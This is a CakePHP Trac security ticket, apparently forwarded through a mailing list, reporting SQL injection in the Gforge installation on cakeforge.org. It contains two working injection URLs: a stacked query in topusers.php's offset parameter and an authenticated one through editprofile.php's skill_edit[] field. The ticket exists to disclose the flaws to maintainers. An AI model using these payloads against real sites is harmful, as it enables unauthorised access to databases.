#6129: Cakeforge.org multiple SQL injections
---------------------------+------------------------------------------------
Reporter: munozferna | Type: Security Exploit
Status: new | Priority: Medium
Milestone: 1.2.x.x | Component: CakePHP.org
Version: 1.2 Final | Severity: Major
Keywords: | Php_version: n/a
Cake_version: |
---------------------------+------------------------------------------------
I noticed today that cakephp was using a Gforge installation, I found and
reported this to Gforge some months ago, I've no idea if they ever did a
proper release, they just answered me 'fixed on svn'. I'm reporting this
against cakephp.org because I can't see a component for cakeforge.
http://cakeforge.org/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5%3B
Requires to be logged in:
http://cakeforge.org/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
--
Ticket URL: <https://trac.cakephp.org/ticket/6129>
CakePHP : The Rapid Development Framework for PHP <https://trac.cakephp.org/>
Cake is a rapid development framework for PHP which uses commonly known design
patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.
Our primary goal is to provide a structured framework that enables PHP users at
all levels to rapidly develop robust web applications, without any loss to
flexibility.
--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups
"tickets cakephp" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/tickets-cakephp?hl=en
-~----------~----~----~----~------~----~------~--~---
